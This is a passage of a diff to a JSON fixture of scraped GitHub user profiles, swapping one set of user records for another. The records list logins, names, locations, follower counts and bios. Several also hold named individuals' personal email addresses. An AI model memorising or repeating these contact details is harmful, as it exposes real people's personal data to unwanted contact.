"created_at": "2017-04-24T17:20:17Z", - "updated_at": "2024-03-11T04:31:38Z", - "node_id": "MDQ6VXNlcjI3OTY5MDky", - "bio": "Hi, I'm a DevOps Engineer. I like to create new projects and share with others. ", + "following_count": 33, + "followers_count": 161, + "public_gists_count": 19, + "public_repositories_count": 129, + "created_at": "2013-10-21T21:21:11Z", + "updated_at": "2024-08-17T18:44:07Z", + "node_id": "MDQ6VXNlcjU3NDE0MDE=", + "bio": "I like to code stuff that I only need once", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1039, + "pk": 6295, "fields": { - "nest_created_at": "2024-09-11T22:40:50.447Z", - "nest_updated_at": "2024-09-11T22:40:50.447Z", + "nest_created_at": "2024-09-22T07:39:51.367Z", + "nest_updated_at": "2024-09-22T18:42:25.720Z", "name": "", - "login": "logopk", + "login": "durg78", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/14347357?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/26635540?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 3, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2015-09-18T12:34:29Z", - "updated_at": "2024-09-06T08:35:11Z", - "node_id": "MDQ6VXNlcjE0MzQ3MzU3", + "public_repositories_count": 6, + "created_at": "2017-03-23T20:17:01Z", + "updated_at": "2024-09-06T02:28:29Z", + "node_id": "MDQ6VXNlcjI2NjM1NTQw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -386228,49 +643302,49 @@ }, { "model": "github.user", - "pk": 1040, + "pk": 6296, "fields": { - "nest_created_at": "2024-09-11T22:40:57.443Z", - "nest_updated_at": "2024-09-11T22:40:57.443Z", - "name": "Marko", - "login": "no-sec-marko", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17177924?v=4", + "nest_created_at": "2024-09-22T07:39:51.675Z", + "nest_updated_at": "2024-09-22T20:31:42.295Z", + "name": "guoguangwu", + "login": "testwill", + "email": "guoguangwug@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8717479?v=4", "company": "", - "location": "", + "location": "china", "collaborators_count": 0, - "following_count": 6, - "followers_count": 12, - "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2016-02-11T13:02:52Z", - "updated_at": "2024-07-25T11:06:59Z", - "node_id": "MDQ6VXNlcjE3MTc3OTI0", - "bio": "", - "is_hireable": false, + "following_count": 7, + "followers_count": 19, + "public_gists_count": 1, + "public_repositories_count": 430, + "created_at": "2014-09-10T02:40:14Z", + "updated_at": "2024-09-18T18:03:12Z", + "node_id": "MDQ6VXNlcjg3MTc0Nzk=", + "bio": "c/c++/go\r\nsnort/suricata", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1041, + "pk": 6297, "fields": { - "nest_created_at": "2024-09-11T22:40:58.705Z", - "nest_updated_at": "2024-09-11T22:40:58.705Z", - "name": "", - "login": "ic32k", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45407347?v=4", + "nest_created_at": "2024-09-22T07:39:51.980Z", + "nest_updated_at": "2024-09-22T18:42:26.345Z", + "name": "jiangyang", + "login": "geekeryy", + "email": "jiangyang.me@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12489875?v=4", "company": "", - "location": "", + "location": "成都", "collaborators_count": 0, - "following_count": 4, - "followers_count": 2, + "following_count": 10, + "followers_count": 7, "public_gists_count": 1, - "public_repositories_count": 75, - "created_at": "2018-11-27T22:38:22Z", - "updated_at": "2024-08-30T15:45:58Z", - "node_id": "MDQ6VXNlcjQ1NDA3MzQ3", + "public_repositories_count": 53, + "created_at": "2015-05-18T03:22:44Z", + "updated_at": "2024-08-23T08:36:02Z", + "node_id": "MDQ6VXNlcjEyNDg5ODc1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -386278,24 +643352,24 @@ }, { "model": "github.user", - "pk": 1042, + "pk": 6298, "fields": { - "nest_created_at": "2024-09-11T22:40:59.945Z", - "nest_updated_at": "2024-09-11T22:40:59.945Z", + "nest_created_at": "2024-09-22T07:39:52.287Z", + "nest_updated_at": "2024-09-22T18:42:26.661Z", "name": "", - "login": "vukitoso", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/27782897?v=4", + "login": "manojgop", + "email": "manoj.gopalakrishnan@intel.com", + "avatar_url": "https://avatars.githubusercontent.com/u/40452026?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 2, - "public_repositories_count": 23, - "created_at": "2017-04-19T18:56:38Z", - "updated_at": "2024-04-22T15:42:43Z", - "node_id": "MDQ6VXNlcjI3NzgyODk3", + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2018-06-21T06:34:46Z", + "updated_at": "2024-09-02T03:08:06Z", + "node_id": "MDQ6VXNlcjQwNDUyMDI2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -386303,99 +643377,99 @@ }, { "model": "github.user", - "pk": 1043, + "pk": 6299, "fields": { - "nest_created_at": "2024-09-11T22:41:01.653Z", - "nest_updated_at": "2024-09-11T22:41:01.653Z", - "name": "Dương Tuấn Kiệt", - "login": "duongtuankiet", + "nest_created_at": "2024-09-22T07:39:52.599Z", + "nest_updated_at": "2024-09-22T18:42:26.977Z", + "name": "", + "login": "potats0", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/59653925?v=4", - "company": "NGN", - "location": "Vietnam", + "avatar_url": "https://avatars.githubusercontent.com/u/42128471?v=4", + "company": "", + "location": "chengdu", "collaborators_count": 0, - "following_count": 3, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2020-01-08T13:51:28Z", - "updated_at": "2024-08-26T10:21:57Z", - "node_id": "MDQ6VXNlcjU5NjUzOTI1", - "bio": "Hello everyone, I'm Kiet, a Cyber Security student.\r\n\r\nI'm working as an junior Network Engineer", - "is_hireable": false, + "following_count": 6, + "followers_count": 411, + "public_gists_count": 1, + "public_repositories_count": 41, + "created_at": "2018-08-06T03:00:23Z", + "updated_at": "2024-04-09T08:17:13Z", + "node_id": "MDQ6VXNlcjQyMTI4NDcx", + "bio": "我是一条小狗 汪汪汪", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1044, + "pk": 6300, "fields": { - "nest_created_at": "2024-09-11T22:41:02.904Z", - "nest_updated_at": "2024-09-11T22:41:02.904Z", - "name": "", - "login": "vloup", + "nest_created_at": "2024-09-22T07:39:52.909Z", + "nest_updated_at": "2024-09-22T18:42:27.295Z", + "name": "yoshiking", + "login": "y05h1k1ng", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2750613?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/45357387?v=4", "company": "", - "location": "::1", + "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 14, - "public_gists_count": 1, - "public_repositories_count": 33, - "created_at": "2012-11-08T12:20:45Z", - "updated_at": "2024-05-28T18:44:51Z", - "node_id": "MDQ6VXNlcjI3NTA2MTM=", - "bio": "The SHA256 for this sentence begins with: c, seven, e, seven, c, two, eight and three.", + "following_count": 6, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2018-11-26T11:33:48Z", + "updated_at": "2024-08-30T07:28:29Z", + "node_id": "MDQ6VXNlcjQ1MzU3Mzg3", + "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "y05h1k1ng" } }, { "model": "github.user", - "pk": 1045, + "pk": 6301, "fields": { - "nest_created_at": "2024-09-11T22:41:04.182Z", - "nest_updated_at": "2024-09-12T02:27:28.383Z", - "name": "Stephen Sigwart", - "login": "ssigwart", + "nest_created_at": "2024-09-22T07:40:02.408Z", + "nest_updated_at": "2024-09-22T18:42:36.828Z", + "name": "Abhinav Saxena", + "login": "luckyster895", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1426848?v=4", - "company": "RunSignup", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26063121?v=4", + "company": "", + "location": "India", "collaborators_count": 0, - "following_count": 0, + "following_count": 24, "followers_count": 11, - "public_gists_count": 8, - "public_repositories_count": 38, - "created_at": "2012-02-10T16:21:15Z", - "updated_at": "2022-12-02T13:55:00Z", - "node_id": "MDQ6VXNlcjE0MjY4NDg=", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2017-02-27T13:32:16Z", + "updated_at": "2024-05-22T06:19:31Z", + "node_id": "MDQ6VXNlcjI2MDYzMTIx", + "bio": "Cybersecurity researcher😎||Love Travelling✈️||Blogger|| Pentester||\r\n", + "is_hireable": true, + "twitter_username": "Luckyster895" } }, { "model": "github.user", - "pk": 1046, + "pk": 6302, "fields": { - "nest_created_at": "2024-09-11T22:41:10.383Z", - "nest_updated_at": "2024-09-11T22:41:10.383Z", - "name": "", - "login": "Xakiadalisabad", + "nest_created_at": "2024-09-22T07:40:02.721Z", + "nest_updated_at": "2024-09-22T18:42:37.145Z", + "name": "Raja Nagori", + "login": "rajanagori-hl60", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/167477701?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/65770246?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-04-18T21:02:33Z", - "updated_at": "2024-04-18T21:02:33Z", - "node_id": "U_kgDOCfuBxQ", + "public_repositories_count": 8, + "created_at": "2020-05-22T12:42:04Z", + "updated_at": "2021-06-18T05:58:11Z", + "node_id": "MDQ6VXNlcjY1NzcwMjQ2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -386403,49 +643477,49 @@ }, { "model": "github.user", - "pk": 1047, + "pk": 6303, "fields": { - "nest_created_at": "2024-09-11T22:41:11.256Z", - "nest_updated_at": "2024-09-11T22:41:11.256Z", - "name": "Victor Villarreal", - "login": "MefhigosetH", - "email": "mefhigoseth@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/527738?v=4", - "company": "Consejo Federal de la Energía Eléctrica", - "location": "Buenos Aires, Argentina", + "nest_created_at": "2024-09-22T07:40:07.749Z", + "nest_updated_at": "2024-09-22T18:42:42.025Z", + "name": "Eric Ehrler", + "login": "LucanSec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/63608689?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 35, - "followers_count": 37, - "public_gists_count": 12, - "public_repositories_count": 36, - "created_at": "2010-12-17T20:22:15Z", - "updated_at": "2024-08-25T23:36:38Z", - "node_id": "MDQ6VXNlcjUyNzczOA==", - "bio": "Electronics, IoT, Offensive Security, Reverse Engineering, Networking, Algorithms and Data Structures, GNU / Linux based solutions and Cloud Native Apps", + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-04-13T18:07:37Z", + "updated_at": "2021-12-10T12:57:07Z", + "node_id": "MDQ6VXNlcjYzNjA4Njg5", + "bio": "", "is_hireable": false, - "twitter_username": "mefhigoseth" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1048, + "pk": 6304, "fields": { - "nest_created_at": "2024-09-11T22:41:13.101Z", - "nest_updated_at": "2024-09-11T22:41:13.101Z", - "name": "Rohan Krishnaswamy", - "login": "rkrishn7", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/47869999?v=4", - "company": "Second Spectrum, Inc.", - "location": "Los Angeles, CA", + "nest_created_at": "2024-09-22T07:40:08.062Z", + "nest_updated_at": "2024-09-22T18:42:42.347Z", + "name": "Bryan Rosander", + "login": "brosander", + "email": "bryanrosander@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/596137?v=4", + "company": "", + "location": "Orlando, FL", "collaborators_count": 0, - "following_count": 0, - "followers_count": 8, - "public_gists_count": 0, - "public_repositories_count": 56, - "created_at": "2019-02-21T21:02:36Z", - "updated_at": "2024-09-07T00:41:12Z", - "node_id": "MDQ6VXNlcjQ3ODY5OTk5", + "following_count": 12, + "followers_count": 34, + "public_gists_count": 12, + "public_repositories_count": 165, + "created_at": "2011-02-02T03:59:09Z", + "updated_at": "2024-07-13T15:54:25Z", + "node_id": "MDQ6VXNlcjU5NjEzNw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -386453,24 +643527,24 @@ }, { "model": "github.user", - "pk": 1049, + "pk": 6305, "fields": { - "nest_created_at": "2024-09-11T22:41:16.050Z", - "nest_updated_at": "2024-09-11T22:41:16.050Z", + "nest_created_at": "2024-09-22T07:40:08.381Z", + "nest_updated_at": "2024-09-22T18:42:42.672Z", "name": "", - "login": "cello86", + "login": "JohnPMurphy", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6987539?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6145405?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2014-03-18T13:38:31Z", - "updated_at": "2024-09-03T20:03:24Z", - "node_id": "MDQ6VXNlcjY5ODc1Mzk=", + "public_repositories_count": 2, + "created_at": "2013-12-09T18:50:58Z", + "updated_at": "2022-08-18T22:31:52Z", + "node_id": "MDQ6VXNlcjYxNDU0MDU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -386478,24 +643552,24 @@ }, { "model": "github.user", - "pk": 1050, + "pk": 6306, "fields": { - "nest_created_at": "2024-09-11T22:41:18.931Z", - "nest_updated_at": "2024-09-11T22:41:18.931Z", - "name": "", - "login": "swagliquido", + "nest_created_at": "2024-09-22T07:40:08.697Z", + "nest_updated_at": "2024-09-22T18:42:43.015Z", + "name": "Justin", + "login": "sdf1jpf", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/164777373?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5741101?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2024-03-24T16:38:57Z", - "updated_at": "2024-09-05T12:03:12Z", - "node_id": "U_kgDOCdJNnQ", + "public_repositories_count": 2, + "created_at": "2013-10-21T20:34:06Z", + "updated_at": "2024-09-09T13:15:00Z", + "node_id": "MDQ6VXNlcjU3NDExMDE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -386503,24 +643577,49 @@ }, { "model": "github.user", - "pk": 1051, + "pk": 6307, "fields": { - "nest_created_at": "2024-09-11T22:41:20.259Z", - "nest_updated_at": "2024-09-11T22:41:20.259Z", - "name": "", - "login": "admiral504", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/27339837?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:40:09.014Z", + "nest_updated_at": "2024-09-22T18:42:43.328Z", + "name": "Reinaldo Deprera", + "login": "rdeprera", + "email": "rdeprera@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4818168?v=4", + "company": "@boriaweb ", + "location": "São Paulo", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 17, + "followers_count": 9, + "public_gists_count": 7, + "public_repositories_count": 37, + "created_at": "2013-06-25T12:31:33Z", + "updated_at": "2024-08-16T06:12:29Z", + "node_id": "MDQ6VXNlcjQ4MTgxNjg=", + "bio": "Entusiasta das tecnologias de desenvolvimento web & mobile.\r\n\r\nApaixonado por educação e mudar a vida das pessoas através de programação.", + "is_hireable": true, + "twitter_username": "rdeprera" + } +}, +{ + "model": "github.user", + "pk": 6308, + "fields": { + "nest_created_at": "2024-09-22T07:40:09.329Z", + "nest_updated_at": "2024-09-22T18:42:43.636Z", + "name": "Sylvain Parise", + "login": "SylvainParise", + "email": "sylvain.parise@ac-bordeaux.fr", + "avatar_url": "https://avatars.githubusercontent.com/u/17638876?v=4", + "company": "Lycée Bertran de Born", + "location": "Périgueux, France", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2017-04-12T08:21:19Z", - "updated_at": "2024-02-13T08:03:16Z", - "node_id": "MDQ6VXNlcjI3MzM5ODM3", + "public_repositories_count": 6, + "created_at": "2016-03-04T08:46:40Z", + "updated_at": "2024-09-17T08:39:02Z", + "node_id": "MDQ6VXNlcjE3NjM4ODc2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -386528,24 +643627,24 @@ }, { "model": "github.user", - "pk": 1052, + "pk": 6309, "fields": { - "nest_created_at": "2024-09-11T22:41:21.516Z", - "nest_updated_at": "2024-09-11T22:41:21.516Z", + "nest_created_at": "2024-09-22T07:40:09.954Z", + "nest_updated_at": "2024-09-22T18:42:44.277Z", "name": "", - "login": "prince-java", + "login": "pxsharma28", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/22311157?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/98188536?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2016-09-20T03:13:31Z", - "updated_at": "2021-02-04T09:10:54Z", - "node_id": "MDQ6VXNlcjIyMzExMTU3", + "public_repositories_count": 1, + "created_at": "2022-01-21T20:36:52Z", + "updated_at": "2023-03-01T15:49:58Z", + "node_id": "U_kgDOBdo8-A", "bio": "", "is_hireable": false, "twitter_username": "" @@ -386553,149 +643652,149 @@ }, { "model": "github.user", - "pk": 1053, + "pk": 6310, "fields": { - "nest_created_at": "2024-09-11T22:41:23.224Z", - "nest_updated_at": "2024-09-11T22:41:23.224Z", - "name": "Mark Collins", - "login": "Marcool04", + "nest_created_at": "2024-09-22T07:40:13.596Z", + "nest_updated_at": "2024-09-22T18:42:47.854Z", + "name": "Gabriel Silva", + "login": "SoftwrDev", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15948152?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/32193242?v=4", "company": "", - "location": "", + "location": "São Paulo, Brazil", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 29, + "followers_count": 22, "public_gists_count": 2, - "public_repositories_count": 16, - "created_at": "2015-11-20T20:04:57Z", - "updated_at": "2024-07-13T07:09:49Z", - "node_id": "MDQ6VXNlcjE1OTQ4MTUy", - "bio": "", + "public_repositories_count": 29, + "created_at": "2017-09-22T09:13:30Z", + "updated_at": "2024-08-25T11:36:55Z", + "node_id": "MDQ6VXNlcjMyMTkzMjQy", + "bio": "I like studying programming and foreign languages. プログラミングや言語の勉強も大好きです.Ich glaube Sprache lernen ist zu toll und Ich willst viel Sprachen zu lerne.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1054, + "pk": 6311, "fields": { - "nest_created_at": "2024-09-11T22:41:24.453Z", - "nest_updated_at": "2024-09-11T22:41:24.453Z", - "name": "Nicolas Rodriguez", - "login": "n-rodriguez", + "nest_created_at": "2024-09-22T07:40:13.925Z", + "nest_updated_at": "2024-09-22T18:42:48.170Z", + "name": "Aaron", + "login": "thackeraaron", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3433835?v=4", - "company": "Nicolas Rodriguez Consulting", - "location": "France", + "avatar_url": "https://avatars.githubusercontent.com/u/25622825?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 21, - "followers_count": 49, - "public_gists_count": 3, - "public_repositories_count": 12, - "created_at": "2013-01-31T02:32:57Z", - "updated_at": "2024-09-10T20:18:25Z", - "node_id": "MDQ6VXNlcjM0MzM4MzU=", - "bio": "Ex founder of @jbox-web, now freelancer as SysAdmin, Ruby/Rails developer and eventually DevOps :) From bare metal to web browser and beyond!", - "is_hireable": true, + "following_count": 6, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2017-02-07T21:45:50Z", + "updated_at": "2024-09-06T09:10:17Z", + "node_id": "MDQ6VXNlcjI1NjIyODI1", + "bio": ":D", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1055, + "pk": 6312, "fields": { - "nest_created_at": "2024-09-11T22:41:28.233Z", - "nest_updated_at": "2024-09-11T22:41:28.233Z", - "name": "", - "login": "MariuszMilka", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/149587435?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:40:14.241Z", + "nest_updated_at": "2024-09-22T18:42:48.496Z", + "name": "Nico MT", + "login": "nicovell3", + "email": "nicovell3@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9163055?v=4", + "company": "Tarlogic Security", + "location": "Spain", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-11-01T12:09:09Z", - "updated_at": "2024-07-06T10:58:06Z", - "node_id": "U_kgDOCOqF6w", - "bio": "", + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 11, + "created_at": "2014-10-12T10:34:57Z", + "updated_at": "2024-04-08T21:19:27Z", + "node_id": "MDQ6VXNlcjkxNjMwNTU=", + "bio": "Golang and Vue.JS developer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1056, + "pk": 6313, "fields": { - "nest_created_at": "2024-09-11T22:41:29.457Z", - "nest_updated_at": "2024-09-11T22:41:29.457Z", - "name": "", - "login": "Rapsody09", + "nest_created_at": "2024-09-22T07:41:08.060Z", + "nest_updated_at": "2024-09-22T18:53:32.685Z", + "name": "Bengt Wegner", + "login": "Petzys", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/48986124?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87223648?v=4", + "company": "IBM", + "location": "Hamburg, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-03-27T10:25:26Z", - "updated_at": "2024-07-08T08:41:25Z", - "node_id": "MDQ6VXNlcjQ4OTg2MTI0", - "bio": "", + "following_count": 19, + "followers_count": 10, + "public_gists_count": 2, + "public_repositories_count": 7, + "created_at": "2021-07-10T07:47:10Z", + "updated_at": "2024-09-16T14:58:31Z", + "node_id": "MDQ6VXNlcjg3MjIzNjQ4", + "bio": "Cyber Security Student @TINF21CS1 DHBW Mannheim; \r\nInterested in Home Automation (Raspberry Pi) and Security", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1057, + "pk": 6314, "fields": { - "nest_created_at": "2024-09-11T22:41:32.388Z", - "nest_updated_at": "2024-09-11T22:41:32.388Z", - "name": "", - "login": "AngelSamuel", - "email": "angelsamuelsc@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1496319?v=4", - "company": "ProfesionalHosting", - "location": "Madrid", + "nest_created_at": "2024-09-22T07:41:08.413Z", + "nest_updated_at": "2024-09-22T18:44:59.527Z", + "name": "Steven Maude", + "login": "StevenMaude", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3818079?v=4", + "company": "@sensiblecodeio @ebmdatalab", + "location": "On the internet", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2012-03-03T12:17:18Z", - "updated_at": "2024-02-26T11:46:44Z", - "node_id": "MDQ6VXNlcjE0OTYzMTk=", - "bio": "", + "following_count": 4, + "followers_count": 75, + "public_gists_count": 19, + "public_repositories_count": 82, + "created_at": "2013-03-09T16:05:46Z", + "updated_at": "2024-07-22T12:43:06Z", + "node_id": "MDQ6VXNlcjM4MTgwNzk=", + "bio": "gradually_learning = [\"Go\", \"Python\", \"computer science\", \"data science\", \"music theory\"] # All my commits GPG signed from 2022-06-20", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1058, + "pk": 6315, "fields": { - "nest_created_at": "2024-09-11T22:41:34.982Z", - "nest_updated_at": "2024-09-11T22:41:34.982Z", - "name": "", - "login": "langenggithub", + "nest_created_at": "2024-09-22T07:41:08.754Z", + "nest_updated_at": "2024-09-22T18:53:30.111Z", + "name": "tokcum", + "login": "tokcum", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/125963074?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/47994370?v=4", "company": "", - "location": "", + "location": "Augsburg", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 5, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-02-21T09:03:55Z", - "updated_at": "2024-07-30T01:06:53Z", - "node_id": "U_kgDOB4ILQg", + "public_repositories_count": 20, + "created_at": "2019-02-25T22:23:01Z", + "updated_at": "2024-08-29T21:07:52Z", + "node_id": "MDQ6VXNlcjQ3OTk0Mzcw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -386703,24 +643802,24 @@ }, { "model": "github.user", - "pk": 1059, + "pk": 6316, "fields": { - "nest_created_at": "2024-09-11T22:41:37.548Z", - "nest_updated_at": "2024-09-11T22:41:37.548Z", + "nest_created_at": "2024-09-22T07:41:17.495Z", + "nest_updated_at": "2024-09-22T18:43:51.635Z", "name": "", - "login": "eduar-hte", + "login": "tschmidtb51", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/130087371?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/65305130?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 16, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2023-04-06T17:23:31Z", - "updated_at": "2024-09-10T15:47:09Z", - "node_id": "U_kgDOB8D5yw", + "public_repositories_count": 30, + "created_at": "2020-05-13T17:26:35Z", + "updated_at": "2024-08-20T23:13:09Z", + "node_id": "MDQ6VXNlcjY1MzA1MTMw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -386728,49 +643827,49 @@ }, { "model": "github.user", - "pk": 1060, + "pk": 6317, "fields": { - "nest_created_at": "2024-09-11T22:41:38.769Z", - "nest_updated_at": "2024-09-11T22:41:38.769Z", - "name": "", - "login": "Eco6", + "nest_created_at": "2024-09-22T07:41:23.110Z", + "nest_updated_at": "2024-09-22T18:44:11.971Z", + "name": "Yuri Govorushchenko", + "login": "metametadata", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/160248349?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4689913?v=4", "company": "", - "location": "", + "location": "Ukraine", "collaborators_count": 0, - "following_count": 53, - "followers_count": 2, - "public_gists_count": 1, - "public_repositories_count": 4, - "created_at": "2024-02-16T14:04:14Z", - "updated_at": "2024-08-27T09:41:56Z", - "node_id": "U_kgDOCY0yHQ", - "bio": "", + "following_count": 0, + "followers_count": 29, + "public_gists_count": 20, + "public_repositories_count": 35, + "created_at": "2013-06-13T15:18:51Z", + "updated_at": "2024-08-05T16:40:28Z", + "node_id": "MDQ6VXNlcjQ2ODk5MTM=", + "bio": "Clojure/ClojureScript software engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1061, + "pk": 6318, "fields": { - "nest_created_at": "2024-09-11T22:41:40.081Z", - "nest_updated_at": "2024-09-11T22:41:40.081Z", - "name": "", - "login": "Lathanderjk", - "email": "lathanderjk@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/9073634?v=4", + "nest_created_at": "2024-09-22T07:41:26.491Z", + "nest_updated_at": "2024-09-22T18:43:59.623Z", + "name": "Tyler Sullivan", + "login": "sullivtr", + "email": "sullivtr@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/24365459?v=4", "company": "", - "location": "Slovakia", + "location": "Tacoma, WA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 11, + "followers_count": 12, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2014-10-08T08:50:50Z", - "updated_at": "2022-12-08T12:58:13Z", - "node_id": "MDQ6VXNlcjkwNzM2MzQ=", + "public_repositories_count": 11, + "created_at": "2016-12-04T05:43:35Z", + "updated_at": "2024-09-02T19:50:52Z", + "node_id": "MDQ6VXNlcjI0MzY1NDU5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -386778,24 +643877,24 @@ }, { "model": "github.user", - "pk": 1062, + "pk": 6319, "fields": { - "nest_created_at": "2024-09-11T22:41:41.304Z", - "nest_updated_at": "2024-09-11T22:41:41.304Z", - "name": "", - "login": "yancong303", + "nest_created_at": "2024-09-22T07:41:28.075Z", + "nest_updated_at": "2024-09-22T19:42:29.060Z", + "name": "Bernhard Schleicher", + "login": "Nikemare", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/41030599?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/102925451?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2018-07-10T01:48:44Z", - "updated_at": "2024-08-02T03:07:07Z", - "node_id": "MDQ6VXNlcjQxMDMwNTk5", + "public_repositories_count": 3, + "created_at": "2022-04-03T20:13:45Z", + "updated_at": "2024-09-11T06:37:52Z", + "node_id": "U_kgDOBiKEiw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -386803,49 +643902,49 @@ }, { "model": "github.user", - "pk": 1063, + "pk": 6320, "fields": { - "nest_created_at": "2024-09-11T22:41:42.573Z", - "nest_updated_at": "2024-09-14T19:32:52.886Z", - "name": "", - "login": "capy3ra", + "nest_created_at": "2024-09-22T07:41:28.391Z", + "nest_updated_at": "2024-09-22T18:44:01.485Z", + "name": "Hubert Plociniczak", + "login": "hubertp", "email": "", - "avatar_url": 